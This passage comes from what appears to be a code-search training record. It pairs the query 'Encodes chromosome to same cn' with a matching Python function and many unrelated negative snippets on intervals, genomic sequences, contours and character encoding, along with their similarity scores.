seq2[j:j_end]\n if i_end > len(seq1) or j_end > len(seq2):\n seqend = True\n else:\n seqend = False\n if ext1 != ext2 or seqend == True:\n segments_equal = False\n segments += \"{} \".format(prev1)\n segments += \"{} [{}, {}] \".format(id1, i, i_end-2)\n segments += \" \"\n segments += \"{} [{}, {}] \".format(id2, j, j_end-2)\n segments += \"\\n\"\n # Add residues to correspondance list.\n for k in range(minlen+extend-1):\n l = i+k\n m = j+k\n correspondances[l].append(m)\n prev1 = ext1\n prev2 = ext2\n extend += 1\n\n return segments", "def overlap(table1, table2):\n out = np.zeros(np.size(table1, axis=0), dtype='bool')\n for i in range(np.size(table1, axis=0)):\n s1_s2 = table1[i, 0] < table2[:, 0] \n s1_e2 = table1[i, 0] <= table2[:, 1]\n e1_s2 = table1[i, 1] < table2[:, 0]\n e1_e2 = table1[i, 1] < table2[:, 1]\n # no overlap occurs when all four parameters above either == 0 or 1\n sum_params = np.sum(np.array([s1_s2, s1_e2, e1_s2, e1_e2]), axis=0)\n olap = (sum_params == 1) | (sum_params == 2) | (sum_params == 3)\n out[i] = np.any(olap)\n return out", "def print_overlaps(gt_list, det_list):\n\n overlap_list = []\n high = 0\n for i_1, grt in enumerate(gt_list):\n for i_2, det in enumerate(det_list):\n overlap = overlap_between(grt, det)\n print(i_1, i_2, overlap)\n if overlap > high:\n high = overlap\n overlap_list.append(high)\n high = 0\n\n print(overlap_list)", "def find_own_objects(cs):\n own_objects = {}\n for con in cs:\n own_objects[con] = []\n for obj in con.extent:\n own_objects[con].append(obj)\n for sub_con in cs:\n if sub_con.extent < con.extent and\\\n obj in sub_con.extent:\n own_objects[con].pop()\n break\n return own_objects", "def recip_compare(s_file, c_file):\r\n recip_list = []\r\n cross_match = 0\r\n for row in s_file.itertuples():\r\n Q_gene = row.Query_gene\r\n adj_gene_interm = row.adjacent_genes.split(\";\")\r\n # list comp to strip metadata and keep gene name\r\n adj_genes = [i.split(\",\")[0] for i in adj_gene_interm]\r\n counter = 0\r\n for adj_gene in adj_genes:\r\n Q_search = c_file[c_file.Query_gene.isin([adj_gene])].index.tolist()\r\n # check to to see that the is one to one match first\r\n if Q_search and c_file.at[Q_search[0], \"gene_type\"] ==\"one_to_one_mapping\":\r\n # Q_search will always results in a list size of 1\r\n S_search = c_file.at[Q_search[0], \"Sytentic_genes\"].split(\",\")[0]\r\n if S_search == Q_gene:\r\n counter += 1\r\n if counter == len(adj_genes):\r\n cross_match += 1\r\n recip_list.append(row)\r\n recip_df = pd.DataFrame(recip_list)\r\n return(recip_df)", "def GetMatchedSubContourLists(\n scListRef,\n scList,\n allValsByFrame,\n orderOfSCsByValue,\n splitLength=1,\n fixedNumInteriorPoints=None,\n):\n ## NOT DONE! MERGE LATER??\n return simplifiedSCListRef, simplifiedSCList", "def get_elim_candidates(df2, df1):\n if df1.loc[1,'Problem']!= problems[0]:\n return\n \n nodes_order_av, nodes_above = order_analysis(df2, df1, 'NewNodes')\n time_order_av, time_above = order_analysis(df2, df1, 'ElapsedSeconds')\n elim_candidates = set(nodes_above[:nodes_order_av]).intersection(set(time_above[:time_order_av]))\n # return their 1-base index also:\n out = [(SEARCHES.index(c)+1, c) for c in elim_candidates]\n return out", "def get_seq_overlap(seq1, seq2):\n\n overlap = 0\n for i in range(len(seq1)):\n if seq1[i] != \"-\" and seq2[i] != \"-\":\n overlap += 1\n\n return overlap", "def test_overlap_set_basic_c(test_input_scheme, overlapped_records_generate):\n callers = ['MuTect2', 'MuSE', 'SomaticSniper']\n maf_lines = [\n 'chr1\\t1\\t1\\tSNP\\tA\\tC\\tA\\tC\\tA\\tA\\t10\\t2\\t8\\t8\\t8\\t0\\t\\t\\n',\n 'chr1\\t1\\t1\\tSNP\\tA\\tC\\tA\\tC\\tA\\tA\\t20\\t2\\t18\\t8\\t8\\t0\\t\\t\\n',\n 'chr1\\t1\\t1\\tSNP\\tA\\tT\\tA\\tT\\tA\\tA\\t20\\t2\\t18\\t8\\t8\\t0\\t\\t\\n'\n ]\n\n record = overlapped_records_generate(\n test_input_scheme,\n maf_lines,\n callers)\n\n assert not record.is_singleton()\n\n assert ['MuSE', 'MuTect2', 'SomaticSniper'] == record.callers\n\n assert ('SNP',) == record.variant_types\n\n assert '1:1:C' in record.locus_allele_map\n assert '1:1:T' in record.locus_allele_map\n assert len(record.locus_allele_map) == 2\n assert len(record.locus_allele_map['1:1:C']) == 2\n assert len(record.locus_allele_map['1:1:T']) == 1\n\n assert ('MuTect2', 'SNP') in record.caller_type_map \\\n and ('MuSE', 'SNP') in record.caller_type_map \\\n and ('SomaticSniper', 'SNP') in record.caller_type_map\n assert len(record.caller_type_map) == 3\n\n assert record.all_single_record() is True", "def extract_upstream(indicies, genome, amount, overlap, min_length=8):\n\n records = []\n prev_end = -1\n index = 0\n for feature in filter(lambda f: f.type == \"CDS\", genome.features):\n if index in indicies:\n end = int(feature.location.start)\n start = max(end - amount, 0)\n if not overlap:\n start = max(start, prev_end)\n\n if (end - start) > min_length:\n upstream = genome[start:end]\n upstream.id = \"{0}|{1}\".format(genome.id, feature.qualifiers[\"locus_tag\"][0])\n records.append(upstream)\n\n index += 1\n prev_end = int(feature.location.end)\n\n return records", "def doubleStartEndPoints(netlist, chip_to_occurrences=None):\n som = 0\n if chip_to_occurrences is None:\n chips_in_netlist = list(itertools.chain.from_iterable(netlist))\n occurrences = np.bincount(chips_in_netlist)\n for i in occurrences:\n if i > 1:\n som += i\n else:\n for i in chip_to_occurrences.values():\n if i > 1:\n som += i\n return som", "def GetContourValuesLengthsAndSubContoursAndOrderOfSubContoursByFrame(\n watershed, allValsByFrame\n):\n scListByFrame, orderOfSCsByValueByFrame = GetSubContoursAndOrderingByFrame(\n watershed, allValsByFrame\n )\n cVLSByFrame = [[sc.cVLS() for sc in scList] for scList in scListByFrame]\n return cVLSByFrame, orderOfSCsByValueByFrame\n\n ## NOT NEEDED! KEEPING FOR REFERENCE!\n # for i in range(len(cVLS)-1,0,-1):\n # for j in range(i-1,-1,-1): # Loop backwards through the sorted list of cvls's... if the value pair matches, check the endpoints (they will always be reversed for adjacent regions (always go ccw...))\n # if cVLS[i][0]!=cVLS[j][0]: # once we no longer match the value pair, we know there are no more matches in the list...\n # break\n # ######## VERIFY THIS ACTUALLY WORKS THE SAME WAY!!!\n # elif (cVLS[i][2][-1],cVLS[i][2][0]]) == (cVLS[j][2][0],cVLS[j][2][-1]): # if 2 subcoutours are the same,\n # if cVLS[j][1]>cVLS[i][1]:\n # cVLS[j],cVLS[i] = cVLS[i],cVLS[j] #swap!\n # shortest = min(cVLS[j][1],cVLS[i][1]) # keep only the one with the minimum length computation\n #\n # cVLS[j][1] = shortest\n # del(cVLS[i])\n # break", "def get_overlap(a, b):\n return max(0, min(a[1], b[1]) - max(a[0], b[0]))", "def example1_perfect_overlap(GeomCA_parameters):\n num_pts = 100\n GeomCA_parameters['experiment_filename_prefix'] = 'perfect_overlap_'\n subfolder = 'perfect_overlap'\n R = np.concatenate([circle(n=num_pts, r=1.5), circle(n=int(num_pts/5), r=0.3)])\n E = np.concatenate([circle(n=num_pts, r=1.45), circle(n=int(num_pts/5), r=0.32)])\n return run_GeomCA_and_visualize(R, E, subfolder, GeomCA_parameters)", "def find_indices(colorhs, centres):\n\n indices = np.zeros(colorhs.shape[0], dtype=np.uint8)\n i = 0\n\n for hs in colorhs:\n # Past Euclidian distance\n past_ed = float(\"inf\")\n for cluster in range(centres.shape[0]):\n # Current Euclidian distance\n curr_ed = (sum((hs - centres[cluster, :]) ** 2)) ** 1/2\n # A frame belongs to the cluster with the minimum ed value.\n if curr_ed <= past_ed:\n past_ed = curr_ed\n indices[i] = cluster\n i += 1\n return indices", "def interval_intersect(a, b, c, d):\r\n return (c <= b) and (a <= d)", "def find_intersection(snp_name):\n intersect = set(snp_name[0])\n for i in range(1,len(snp_name)):\n intersect = intersect.intersection(set(snp_name[i]))\n return list(intersect)", "def new_resolve_unique_contigs(scaffold_list, unique_contigs_list):\n \n contig_location = {}\n s_l = copy.deepcopy(scaffold_list)\n \n #first deal with any scaffolds that have more than one copy of a unique contig\n to_remove = []\n for scaf in s_l: \n for contig in unique_contigs_list:\n if scaf.count(contig) > 1:\n scaffold_parts = split_siamese(contig, scaf)\n to_remove.append(scaf)\n s_l.extend(scaffold_parts)\n break \n for scaf in to_remove:\n s_l.remove(scaf) \n\n\n for contig in unique_contigs_list:\n #if contig[:4] == \"five\": \n finds = find_unique_contig(contig, s_l)\n\n if len(finds) > 1:\n contig_location[contig] = finds\n\n sc_ov = {}\n sc_ov = make_scaff_overlap_dict(contig_location)\n\n #This is the new bit that takes just the first conflicted contig \n first_k = list(sc_ov.items())[0:1]\n first_sc_ov = dict(first_k)\n new_scaffold_list = combine_overlapping_contigs(first_sc_ov, s_l)\n\n #Split off unique scaffolds attached by their 3' ends to multiple scaffolds\n \n for contig in contig_location:\n if contig[:5] == \"three\":\n for scaf in contig_location[contig]:\n conflict = False\n if scaf.index(contig) == 1:\n conflict = True\n new_left_scaf = scaf[:3]\n new_right_scaf = scaf[3:]\n if scaf.index(contig) == len(scaf) - 2:\n conflict = True\n new_left_scaf = scaf[:-3]\n new_right_scaf = scaf[-3:]\n if conflict:\n new_left_scaf.append(\"link_conflict6\")\n new_right_scaf.insert(0,\"link_conflict6\")\n if len(new_left_scaf) >= 4: \n new_scaffold_list.append(new_left_scaf)\n if len(new_right_scaf) >= 4:\n new_scaffold_list.append(new_right_scaf)\n if scaf in new_scaffold_list:\n new_scaffold_list.remove(scaf)\n\n return new_scaffold_list", "def calcOverlap(intervals):\n bp = 0 \n for i in intervals:\n bp += sum([overlapCases(i, j) for j in intervals])\n return(bp)", "async def test_get_cds_start_end(test_db):\n expected = (61, 2362)\n resp = await test_db.get_cds_start_end(\"NM_004333.4\")\n assert resp == expected\n\n resp = await test_db.get_cds_start_end(\"ENST00000288602.6\")\n assert resp == expected\n\n resp = await test_db.get_cds_start_end(\"NM_004333.999\")\n assert resp is None", "def source_positions(self, dist_cutoff=None):\n \n crds = {}\n for fn in self.srclists:\n \n print(\"OM::source_positions -- checking: \",fn) \n ff = pyfits.open(fn)\n idf = fn[-20:-14]\n obsid = ff[0].header[\"OBS_ID\"]\n print(obsid, idf)\n try:\n ra, dec = ff[1].data[\"RA\"], ff[1].data[\"DEC\"]\n except:\n print(fn,\" does not contain RA, Dec coordinates.\")\n continue\n rate = ff[1].data[\"CORR_RATE\"]\n coords = C.SkyCoord(ra, dec, unit=(\"deg\", \"deg\"), frame='icrs')\n tc = []\n ci = []\n for i, c in enumerate(coords):\n #print(c)\n if len(tc) == 0: \n tc.append(c.to_string(\"hmsdms\",sep=':', precision=2, pad=True))\n ci.append(i)\n continue\n #print(c, tc, sc)\n dist = c.separation(coords[ci]).arcsec\n #print(\"dist: \",dist)\n gi = np.where(dist>2)[0]\n for j in gi:\n tc.append(c.to_string(\"hmsdms\",sep=':', precision=2, pad=True))\n #ci.append(j)\n if len(tc)>0:\n crds[idf] = tc\n #else:\n if len(crds) == 0:\n return None\n return {obsid:crds}", "def overlap(a, b):\n return not(a[2]<=b[0] or a[3]<=b[1] or a[0]>=b[2] or a[1]>=b[3])", "def locate_slice_chunk(slice_start, slice_stop, height, overlap_metadata):\n if slice_stop < slice_start:\n raise ValueError(\n \"Stopping index must be larger than the starting index!!!\")\n g_nrow = overlap_metadata.shape[0] + 1\n side = overlap_metadata[0, 0, 1]\n overlap_list = overlap_metadata[:, 0, 0]\n if side == 1:\n list_slices = [(np.arange(i * height, i * height + height) -\n np.sum(overlap_list[0: i])) for i in range(g_nrow)]\n else:\n list_slices = [\n (np.arange(i * height + height - 1, i * height - 1, -1) -\n np.sum(overlap_list[0: i])) for i in range(g_nrow)]\n list_slices = np.asarray(list_slices)\n results = []\n for i, list1 in enumerate(list_slices):\n result1 = []\n if side == 1:\n for slice_idx in range(slice_start, slice_stop):\n pos = np.squeeze(np.where(list1 == slice_idx)[0])\n if pos.size == 1:\n fact = 1.0\n if i == 0:\n ver_overlap = overlap_list[i]\n dis1 = len(list1) - pos - 1\n if dis1 < ver_overlap:\n fact = dis1 / (ver_overlap - 1)\n elif i == (g_nrow - 1):\n ver_overlap = overlap_list[i - 1]\n if pos < ver_overlap:\n fact = pos / (ver_overlap - 1)\n else:\n ver_overlap1 = overlap_list[i]\n dis1 = len(list1) - pos - 1\n if dis1 < ver_overlap1:\n fact = dis1 / (ver_overlap1 - 1)\n if pos < ver_overlap1:\n fact = pos / (ver_overlap1 - 1)\n ver_overlap2 = overlap_list[i - 1]\n dis1 = len(list1) - pos - 1\n if dis1 < ver_overlap2:\n fact = dis1 / (ver_overlap2 - 1)\n if pos < ver_overlap2:\n fact = pos / (ver_overlap2 - 1)\n result1.append([i, pos, fact])\n else:\n for slice_idx in range(slice_start, slice_stop):\n pos = np.squeeze(np.where(list1 == slice_idx)[0])\n if pos.size == 1:\n fact = 1.0\n if i == 0:\n ver_overlap = overlap_list[i]\n if pos < ver_overlap:\n fact = 1.0 * pos / (ver_overlap - 1)\n elif i == (g_nrow - 1):\n ver_overlap = overlap_list[i - 1]\n dis1 = len(list1) - pos - 1\n if dis1 < ver_overlap:\n fact = 1.0 * dis1 / (ver_overlap - 1)\n else:\n ver_overlap1 = overlap_list[i]\n dis1 = len(list1) - pos - 1\n if dis1 < ver_overlap1:\n fact = 1.0 * dis1 / (ver_overlap1 - 1)\n if pos < ver_overlap1:\n fact = 1.0 * pos / (ver_overlap1 - 1)\n ver_overlap2 = overlap_list[i - 1]\n dis1 = len(list1) - pos - 1\n if dis1 < ver_overlap2:\n fact = 1.0 * dis1 / (ver_overlap2 - 1)\n if pos < ver_overlap2:\n fact = 1.0 * pos / (ver_overlap2 - 1)\n result1.append([i, pos, fact])\n if len(result1) > 0:\n results.append(result1)\n return results", "def get_all_offgrid_pin(self, pin, insufficient_list):\n #print(\"INSUFFICIENT LIST\",insufficient_list)\n # Find the coordinate with the most overlap\n any_overlap = set()\n for coord in insufficient_list:\n full_pin = self.convert_track_to_pin(coord)\n # Compute the overlap with that rectangle\n overlap_rect=pin.compute_overlap(full_pin)\n # Determine the max x or y overlap\n max_overlap = max(overlap_rect)\n if max_overlap>0:\n any_overlap.update([coord])\n \n return any_overlap", "def overlap_with(self, other):", "def find_overlapping(seq, subseq):\n \n pos, count = 0, 0\n while True:\n pos = seq.find(subseq, pos)\n if pos < 0:\n break\n pos += 1 \n count += 1\n return count", "def startEndPoints(mazz):\n for i in range (len(mazz)):\n for j in range (len(mazz[i])):\n if mazz[i][j] == 6:\n startx = i\n starty = j\n elif mazz[i][j] == 7:\n endx = i\n endy = j\n return startx, starty, endx, endy", "def _contiguous_ranges(span_list):\n output = []\n for _, span in itertools.groupby(\n enumerate(span_list), lambda p: p[1] - p[0]):\n span = list(span)\n output.append((span[0][1], span[-1][1]))\n return output", "def flyc_nofly_cord_pos_search(po, fwmdlfile, start_pos, func_align, data_align, min_match_accepted):\n fwmdlfile.seek(0, os.SEEK_END)\n fwmdlfile_len = fwmdlfile.tell()\n enfcord = FlycNoFlyCoords()\n match_count = 0\n match_pos = -1\n match_entries = 0\n reached_eof = False\n pos = start_pos\n while (True):\n # Check how many correct zone entries we have\n entry_count = 0\n entry_pos = pos\n while (True):\n fwmdlfile.seek(entry_pos, os.SEEK_SET)\n if fwmdlfile.readinto(enfcord) != sizeof(enfcord):\n reached_eof = True\n break\n # The array ends with int value storing its size\n if (entry_count >= min_match_accepted) and (enfcord.latitude == entry_count):\n break\n if not flyc_nofly_is_proper_cord_entry(po, fwmdlfile, fwmdlfile_len, enfcord, func_align, data_align, pos, entry_pos):\n break\n entry_count += 1\n entry_pos += sizeof(enfcord)\n # Do not allow entry at EOF\n if (reached_eof):\n break\n # If entry is ok, consider it a match\n if entry_count > min_match_accepted:\n if (po.verbose > 1):\n print(\"{}: Matching coords array at 0x{:08x}: {:d} entries\".format(po.mdlfile,pos,entry_count))\n if (entry_count >= match_entries):\n match_pos = pos\n match_entries = entry_count\n match_count += 1\n # Set position to search for next entry\n if entry_count >= min_match_accepted:\n pos += entry_count * sizeof(enfcord)\n else:\n pos += data_align - (pos%data_align)\n if (match_count > 1):\n eprint(\"{}: Warning: multiple ({:d}) matches found for fly coords array with alignment 0x{:02x}\".format(po.mdlfile,match_count,data_align))\n if (match_count < 1):\n return -1, 0\n return match_pos, match_entries", "def overlaps(x1, x2, y1, y2):\n\n return x1 <= y2 and y1 <= x2", "def rm_scns_intersect(self, all_scns=False):\n if self.scn_intersect:\n import rsgislib.vectorutils\n logger.debug(\"Creating Database Engine and Session.\")\n db_engine = sqlalchemy.create_engine(self.db_info_obj.dbConn)\n session_sqlalc = sqlalchemy.orm.sessionmaker(bind=db_engine)\n ses = session_sqlalc()\n logger.debug(\"Perform query to find scenes which need downloading.\")\n\n if all_scns:\n scns = ses.query(EDDSentinel1ASF).order_by(EDDSentinel1ASF.Acquisition_Date.asc()).all()\n else:\n scns = ses.query(EDDSentinel1ASF).filter(EDDSentinel1ASF.Downloaded == False).order_by(\n EDDSentinel1ASF.Acquisition_Date.asc()).all()\n\n if scns is not None:\n eodd_vec_utils = eodatadown.eodatadownutils.EODDVectorUtils()\n vec_idx, geom_lst = eodd_vec_utils.create_rtree_index(self.scn_intersect_vec_file,\n self.scn_intersect_vec_lyr)\n\n for scn in scns:\n logger.debug(\"Check Scene '{}' to check for intersection\".format(scn.PID))\n rsgis_utils = rsgislib.RSGISPyUtils()\n north_lat = scn.North_Lat\n south_lat = scn.South_Lat\n east_lon = scn.East_Lon\n west_lon = scn.West_Lon\n # (xMin, xMax, yMin, yMax)\n scn_bbox = [west_lon, east_lon, south_lat, north_lat]\n\n intersect_vec_epsg = rsgis_utils.getProjEPSGFromVec(self.scn_intersect_vec_file,\n self.scn_intersect_vec_lyr)\n if intersect_vec_epsg != 4326:\n scn_bbox = rsgis_utils.reprojBBOX_epsg(scn_bbox, 4326, intersect_vec_epsg)\n\n has_scn_intersect = eodd_vec_utils.bboxIntersectsIndex(vec_idx, geom_lst, scn_bbox)\n if not has_scn_intersect:\n logger.info(\"Removing scene {} from Sentinel-1 as it does not intersect.\".format(scn.PID))\n ses.query(EDDSentinel1ASF.PID).filter(EDDSentinel1ASF.PID == scn.PID).delete()\n ses.commit()\n ses.close()", "def find_contour(hole_atoms, atom_list):\n contour_atoms = []\n extra_atoms = []\n global bond_list\n bond_list = bond_list_1\n for atom in hole_atoms:\n c = [bond[0] for bond in identify_bonds(atom, atom_list) if ((bond[0] not in hole_atoms) and (bond[0] not in contour_atoms))]\n for element in c:\n contour_atoms.append(element)\n for atom in atom_list:\n c = [bond[0] for bond in identify_bonds(atom, atom_list)]\n count = 0\n for element in c:\n if element in contour_atoms:\n count += 1\n if (count >= 2):\n extra_atoms.append(atom)\n for atom in atom_list:\n c = [bond[0] for bond in identify_bonds(atom, atom_list)]\n for element in c:\n if ((element in contour_atoms) or (element in extra_atoms)):\n for i in [bond[0] for bond in identify_bonds(element, atom_list)]:\n if ((i in hole_atoms) and (atom not in hole_atoms) and (atom not in contour_atoms) and (atom not in extra_atoms)):\n extra_atoms.append(atom) \n \n contour_atoms = contour_atoms + extra_atoms\n \n extra_atoms2 = []\n for atom in contour_atoms:\n for atom2 in contour_atoms:\n if (atom != atom2):\n c = [bond[0] for bond in identify_bonds(atom, atom_list) if ((bond in identify_bonds(atom2, atom_list)) and (bond[0] not in (contour_atoms)))]\n if (len(c) != 0):\n extra_atoms2.append(c[0]) \n for element in extra_atoms2:\n contour_atoms.append(element)\n return contour_atoms", "def locateInflectionPoint(self, start, end, list):\n if end-start > 10:\n for x in range(start+5, end-5):\n if (list[x] < list[x-1] and list[x] < list[x-2] and list[x] < list[x-3]\n and #list[x] < list[x-4] and list[x] < list[x-5] and\n list[x] < list[x+1] and list[x] < list[x+2] and list[x] < list[x+3]):\n #and list[x] < list[x+4] and list[x] < list[x+5]):\n self.inflections += 1", "def find_LCS(seq1, seq2, all=False):\n C = [[0 for j in range(len(seq2) + 1)] for i in range(len(seq1) + 1)]\n\n for i in range(1, len(seq1) + 1):\n for j in range(1, len(seq2) + 1):\n inter = seq1[i - 1].intersection(seq2[j - 1])\n\n C[i][j] = max([C[i - 1][j - 1] + len(inter),\n C[i - 1][j],\n C[i][j - 1]])\n\n # now we need to backtrack the structure to get the pattern\n if all:\n all_lcs = backtrack_all_LCS(C, seq1, seq2, len(seq1), len(seq2))\n return {i[1:] for i in all_lcs}\n\n lcs = []\n backtrack_LCS(C, seq1, seq2, len(seq1), len(seq2), lcs)\n return lcs", "def _get_intersections():\n with _get_mongo_client() as client:\n coll = client[mongo_database]['locations']\n return coll.find({'intersection_number': {'$exists': True}}, {'_id': False})" ]
[ "0.6343779", "0.5909693", "0.5851059", "0.57616645", "0.5732729", "0.568256", "0.5675713", "0.56729394", "0.5659118", "0.56387144", "0.5623953", "0.558914", "0.5588006", "0.5570414", "0.55475664", "0.5545426", "0.5528489", "0.5526816", "0.5525146", "0.5520476", "0.5492296", "0.5491623", "0.5450726", "0.5413808", "0.5407713", "0.5399254", "0.53888637", "0.53869677", "0.5373511", "0.53723156", "0.5370139", "0.53578293", "0.5338607", "0.533228", "0.5321556", "0.53123134", "0.52841103", "0.52837086", "0.52749896", "0.5262743", "0.5258874", "0.5250571", "0.5243211", "0.5241573", "0.5237652", "0.52314276", "0.5231056", "0.52254695", "0.52200854", "0.5214407", "0.52135575", "0.51995665", "0.5196762", "0.51921487", "0.5187422", "0.5180529", "0.51727736", "0.51504546", "0.51502675", "0.5142768", "0.51409495", "0.5140664", "0.5140289", "0.51377594", "0.5133773", "0.51301336", "0.5125089", "0.5123136", "0.512312", "0.5117282", "0.51127535", "0.51043767", "0.5093431", "0.50925153", "0.50920117", "0.50890124", "0.5088957", "0.5084334", "0.50785685", "0.5077387", "0.5073449", "0.5072427", "0.5071769", "0.5070553", "0.5067407", "0.50579566", "0.50559187", "0.505439", "0.5053055", "0.5051645", "0.50493455", "0.5047618", "0.50445944", "0.5036161", "0.503317", "0.5032396", "0.50303566", "0.50257283", "0.5022315", "0.502211" ]
0.7374044
0
Encodes chromosome to same cn
def encode_chromosome(in_num): convert_dict = {23: "X", 24: "Y", 25: "MT"} return convert_dict[in_num] if in_num in convert_dict else str(in_num)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def __encode(self):\n\n for i, char in enumerate(self.__chars):\n self.__char2idx[char] = i\n self.__idx2char[i] = char", "def encode(self, C, num_rows):\n x = np.zeros((num_rows, len(self.chars)))\n print(C)\n for i, c in enumerate(C):\n x[i, self.char_indices[c]] = 1\n return x", "def encode(self, C, num_rows):\n x = np.zeros((num_rows, len(self.chars)))\n for i, c in enumerate(C):\n x[i, self.char_indices[c]] = 1\n return x", "def encode(self, C, num_rows):\n x = np.zeros((num_rows, len(self.chars)))\n for i, c in enumerate(C):\n x[i, self.char_indices[c]] = 1\n return x", "def encode(self):\n\n # Start from occupancy\n encoding = self.occupancy.copy();\n\n # Add goals\n for g in self.goals:\n if g in self.discovered_goals:\n encoding[self.tocellcoord[g]] += 10\n else:\n encoding[self.tocellcoord[g]] += 100\n\n # Add agents\n for pos in self.currstate:\n encoding[self.tocellcoord[pos]] += 2\n\n return encoding", "def encode_char(self, char):\n\n # Pass char through plugboard\n if self.plugboard is not None:\n char = self.plugboard.encode(char)\n\n # Convert char to an index\n idx = ord(char) % 65\n\n # Rotate Rotors\n self.rotate_rotors()\n\n # Forward pass through rotors\n for i, rotor in enumerate(self.rotors):\n _, idx = rotor.encode_right_to_left(idx)\n\n # Pass through reflector\n _, idx = self.reflector.encode_right_to_left(idx)\n\n # Backwards pass through rotors\n for rotor in reversed(self.rotors):\n _, idx = rotor.encode_left_to_right(idx)\n\n # Output char\n char = chr(65 + idx)\n\n # Pass char through plugboard\n if self.plugboard is not None:\n char = self.plugboard.encode(char)\n\n return char", "def encode(self, seq):", "def encode(self, char):\n\n if char == self.pair[0]:\n return self.pair[1]\n elif char == self.pair[1]:\n return self.pair[0]\n else:\n return char", "def encode(self, letter):\n\n for plug in self.plugleads:\n if plug.pair[0] == letter or plug.pair[1] == letter:\n return plug.encode(letter)\n return letter", "def sc2selfies(chromosome):\n selfie = \"\".join(x for x in list(chromosome))\n return selfie", "def encode_pos(i, j):\n return 3 * i + j", "def change(coor):\n return chr(coor[0] + 65), coor[1] + 1", "def mapChrForVersion(c):\n\tif c.startswith('chrM'):\n\t\treturn 998\n\telif c == 'chrX':\n\t\treturn 999\n\telif c == 'chrY':\n\t\treturn 1000\n\telse:\n\t\treturn int(c[3:])", "def encode_identifier(alphabet, n):\r\n c = alphabet[n & 0b1111]\r\n n>>=4\r\n while n > 0:\r\n c = c + alphabet[n & 0b111111]\r\n n>>=6\r\n return c", "def binaryEncode(peptide):\n\n #do 1 hot encoding\n binaryPeptide=''\n for aa in peptide:\n binaryAmino=''\n if aa =='A':\n binaryAmino='10000000000000000000'\n if aa =='R':\n binaryAmino='01000000000000000000'\n if aa =='N':\n binaryAmino='00100000000000000000'\n if aa =='D':\n binaryAmino='00010000000000000000'\n if aa =='C':\n binaryAmino='00001000000000000000'\n if aa =='Q':\n binaryAmino='00000100000000000000'\n if aa =='E':\n binaryAmino='00000010000000000000'\n if aa =='G':\n binaryAmino='00000001000000000000'\n if aa =='H':\n binaryAmino='00000000100000000000'\n if aa =='I':\n binaryAmino='00000000010000000000'\n if aa =='L':\n binaryAmino='00000000001000000000'\n if aa =='K':\n binaryAmino='00000000000100000000'\n if aa =='M':\n binaryAmino='00000000000010000000'\n if aa =='F':\n binaryAmino='00000000000001000000'\n if aa =='P':\n binaryAmino='00000000000000100000'\n if aa =='S':\n binaryAmino='00000000000000010000'\n if aa =='T':\n binaryAmino='00000000000000001000'\n if aa =='W':\n binaryAmino='00000000000000000100'\n if aa =='Y':\n binaryAmino='00000000000000000010'\n if aa =='V':\n binaryAmino='00000000000000000001'\n binaryPeptide=binaryPeptide +binaryAmino\n if len(binaryPeptide) == 500*20:\n break \n \n while len(binaryPeptide) < 500*20:\n binaryPeptide = binaryPeptide +str(0)\n \n binaryPeptide = np.array(list(binaryPeptide),dtype=float)\n binaryPeptide = np.reshape(binaryPeptide,(binaryPeptide.shape[0],1))\n binaryPeptide = np.transpose(binaryPeptide)\n return binaryPeptide", "def encode_left_to_right(self, index_in):\n\n char_pins = self.pins[index_in]\n index_out = self.mapping.index(char_pins)\n char_out = self.pins[index_out]\n return char_out, index_out", "def mutate(self, chrom):\n pass", "def bed_encoding(bed_df, reference):\n\n fasta = Fasta(reference, as_raw=True)\n seq_list = list()\n for _, i in bed_df.iterrows():\n print(f\"region:{i[0]}:{i[1]}-{i[2]}\")\n seq_list.append(one_hot_encoding(fasta[i[0]][i[1]:i[2]]))\n result = np.stack(seq_list)\n return result", "def to_chromosome(chromosome):\n\n if isinstance(chromosome, make_chromosome):\n return chromosome\n else:\n return make_chromosome(chromosome)", "def _encode(self, upper):\n return upper", "def encode(num):\n encode = ''\n \n if (num < 0):\n return ''\n \n while (num >= base_count): \n mod = num % base_count\n encode = alphabet[mod] + encode\n num = num // base_count\n \n if (num):\n encode = alphabet[num] + encode\n \n return encode", "def apply_on_chromosome(self, func, **kwargs):\n func(self, **kwargs)", "def save(self, *args, **kwargs):\n self.chromosome_no = CHROMOSOME_STR_TO_CHROMOSOME_INT.get(self.chromosome, 0)\n super().save(*args, **kwargs)", "def save(self, *args, **kwargs):\n self.chromosome_no = CHROMOSOME_STR_TO_CHROMOSOME_INT.get(self.chromosome, 0)\n super().save(*args, **kwargs)", "def increment_chromosome(mutated_genome):\n index1 = random.randint(0,max(0,len(mutated_genome)-2))\n seed = random.randint(0,2)\n if seed == 0:\n index2 = index1 + 1\n elif seed == 1:\n index2 = random.randint(index1,max(index1,len(mutated_genome)-1))\n else: #seed == 2:\n index2 = max(0,len(mutated_genome)-1)\n temp = mutated_genome[index1]\n mutated_genome[index1] = mutated_genome[index2]\n mutated_genome[index2] = temp", "def encode1(s,n):\n r = \"\"\n for l in s:\n l = ord(l) # convert to ascii\n l = l - 97 # 'a' is 97 so we want to reduce so 'a'=0 'b'=1 etc\n l = l + n # add the offset\n l=l%26 # use mod so that we wrap around back to 'a' if we go past 'z'\n l=l+97 # and add back the 97\n r = r + chr(l)\n return r", "def encode(self,agent_pos,drone_pos):\n\n codeSize = self.width * self.height * 3\n\n array = np.zeros(shape=(self.width, self.height, 3), dtype='uint8')\n\n for j in range(0, self.height):\n for i in range(0, self.width):\n\n v = self.get(i, j)\n\n if v == None:\n continue\n\n array[i, j, 0] = OBJECT_TO_IDX[v.type]\n array[i, j, 1] = COLOR_TO_IDX[v.color]\n\n array[agent_pos[0],agent_pos[1],0]=10\n array[agent_pos[0],agent_pos[1],1]=10\n array[drone_pos[0],drone_pos[1],0]=15\n array[drone_pos[0],drone_pos[1],1]=15\n\n\n\n return array", "def encode_instruction(instruction: str) -> int:\n\ta, b, c = convert_instruction(instruction)\n\treturn encode_pair(a, encode_pair(b, c))", "def encode(src):\n if not src:\n return None\n\n output = scramble(src)\n\n return ' '.join(output[i:i+5] for i in xrange(0, len(output), 5))", "def encode_rgi(rgi_df, genome_ids):\n rgi_encoded = pd.DataFrame(index=genome_ids,\n columns=rgi_df['Best_Hit_ARO'].unique()).fillna(0)\n # print(rgi_encoded)\n for genome_id, rgi_data in rgi_df.iterrows():\n rgi_encoded.loc[rgi_data['Sample'], rgi_data['Best_Hit_ARO']] += 1\n\n return rgi_encoded", "def fix_chromosome(self, copy=False):\n region = self.copy() if copy else self\n if region.chromosome.startswith('chr'):\n region.chromosome = region.chromosome[3:]\n else:\n region.chromosome = 'chr' + region.chromosome\n return region", "def 